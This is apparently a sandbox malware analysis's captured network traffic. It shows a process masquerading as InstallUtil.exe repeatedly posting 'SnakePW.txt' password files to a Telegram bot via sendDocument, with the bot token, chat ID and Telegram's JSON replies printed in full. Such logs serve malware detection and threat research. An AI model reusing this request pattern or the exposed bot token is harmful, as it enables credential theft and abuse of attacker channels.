                                                                                    Data Ascii: {"ok":true,"result":{"message_id":153,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765213


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.2.550040149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:53 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3ae7bc552675
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:53 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 65 37 62 63 35 35 32 36 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3ae7bc552675Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:54 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:54 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:54 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 34
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":154,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765214


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.2.550041149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:54 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3b2d0b6cb5dd
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:54 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 32 64 30 62 36 63 62 35 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3b2d0b6cb5ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:55 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:55 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:55 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 35
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":155,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765215


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.2.550042149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:55 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3b7b07ae2ae4
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:55 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 37 62 30 37 61 65 32 61 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3b7b07ae2ae4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:56 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:56 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:56 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 36
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":156,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765216


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.2.550043149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:56 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3bbb3d171aee
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:56 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 62 62 33 64 31 37 31 61 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3bbb3d171aeeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:57 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:57 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:57 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 37
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":157,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765217


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.2.550044149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:57 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3c0c82ab07ad
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:57 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 30 63 38 32 61 62 30 37 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3c0c82ab07adContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:58 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:58 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:58 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 38
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":158,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765218


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.2.550045149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:58 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3c59fe210fcf
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:58 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 35 39 66 65 32 31 30 66 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3c59fe210fcfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:59 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:59 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:59 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 39
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":159,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765219


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.2.550046149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:59 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3ca360ff424e
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:59 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 61 33 36 30 66 66 34 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3ca360ff424eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:47:00 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:47:00 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:47:00 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 32 30
